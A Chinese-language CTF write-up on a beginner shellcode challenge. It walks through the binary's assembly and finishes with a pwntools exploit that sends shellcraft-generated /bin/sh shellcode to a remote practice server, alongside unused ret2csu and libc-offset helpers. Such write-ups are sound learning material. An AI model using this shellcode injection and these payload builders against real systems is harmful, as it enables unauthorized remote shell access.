这题虽然是很简单的shellcode 但是因为禁用了ida的反编译 需要我们阅读汇编理解程序 就当作提高汇编理解能力了
1 2 3 4 5 6 7 8 [!] Could not populate PLT: invalid syntax (unicorn.py, line 110) [*] '/home/chen/pwn' Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX disabled PIE: PIE enabled RWX: Has RWX segments
没有开NX保护 可以在内存上执行系统调用
拖到ida后发现f5报错 于是只能阅读汇编代码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 .text:0000000000001155 ; __unwind { .text:0000000000001155 push rbp .text:0000000000001156 mov rbp, rsp .text:0000000000001159 sub rsp, 410h .text:0000000000001160 mov rax, cs:stdin@@GLIBC_2_2_5 .text:0000000000001167 mov esi, 0 ; buf .text:000000000000116C mov rdi, rax ; stream .text:000000000000116F call _setbuf .text:0000000000001174 mov rax, cs:stdout@@GLIBC_2_2_5 .text:000000000000117B mov esi, 0 ; buf .text:0000000000001180 mov rdi, rax ; stream .text:0000000000001183 call _setbuf .text:0000000000001188 mov rax, cs:stderr@@GLIBC_2_2_5 .text:000000000000118F mov esi, 0 ; buf .text:0000000000001194 mov rdi, rax ; stream .text:0000000000001197 call _setbuf .text:000000000000119C lea rdi, s ; "Show me your magic!" //断点1 .text:00000000000011A3 call _puts .text:00000000000011A8 lea rax, [rbp+buf] .text:00000000000011AF mov edx, 400h ; nbytes .text:00000000000011B4 mov rsi, rax ; buf .text:00000000000011B7 mov edi, 0 ; fd .text:00000000000011BC mov eax, 0 .text:00000000000011C1 call _read //断点2 .text:00000000000011C6 mov [rbp+var_4], eax .text:00000000000011C9 cmp [rbp+var_4], 0 .text:00000000000011CD jg short loc_11D6 //断点3 .text:00000000000011CF mov eax, 0 .text:00000000000011D4 jmp short locret_11E4
断点1:
在这之前的汇编代码 执行了两步 一是清空缓存区 防止数据输入输出出现问题 第二步调用puts函数输出了一段字符串
断点2:
调用了read函数 可以手动反编译为read(0,buf,0x400)
断点3:
紧接着将**$eax的值赋给 rbp+var_4** 与0进行比较
cmp的功能相当于减法指令,只是不保存结果
jg指令 如果大于就跳转 即如果$eax大于0就跳转到loc_11D6函数
1 2 3 4 .text:00000000000011D6 loc_11D6: ; CODE XREF: main+78↑j .text:00000000000011D6 lea rax, [rbp+buf] .text:00000000000011DD call rax .text:00000000000011DF mov eax, 0
lea指令将$rbp+buf即我们上面通过read输入的变量的地址赋值给rax
随后利用call指令调用这个地址的内容
也就是说我们只要直接输入shellcode就可以做到系统调用
exp:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 from pwn import *def libcmath (function_addr,function_name ): libc_addr = function_addr - libc.sym[function_name] system_addr = libc_addr + libc.sym['system' ] binsh_addr = libc_addr + next (libc.search(b"/bin/sh" )) return system_addr,binsh_addr def csu (offset,gadget2_addr,call_addr,rdx,rsi,rdi,gadget1_addr,ret_addr ): payload = cyclic(offset) payload += p64(gadget2_addr) payload += cyclic(0x8 ) payload += p64(0 ) payload += p64(1 ) payload += p64(call_addr) payload += p64(rdx) payload += p64(rsi) payload += p64(rdi) payload += p64(gadget1_addr) payload += cyclic(56 ) payload += p64(ret_addr) return payload def localconnect (filename ): io = process(filename) return io def remoteconnect (ip,port ): io = remote(ip,port) return io def elf_libc (filename,libc_name ): elf = ELF(filename) libc = ELF(libc_name) return elf,libc def debug (button ): if (button==1 ): context.log_level = "debug" filename = 'pwn' libc_name = 'buu_libc_ubuntu16_64' ip="node4.buuoj.cn" port=29656 elf,libc = elf_libc(filename,libc_name) io = remoteconnect(ip,port) debug(1 ) io.recvuntil("Show me your magic!" ) context.arch = "amd64" shellcode = asm(shellcraft.sh()) io.send(shellcode) io.interactive()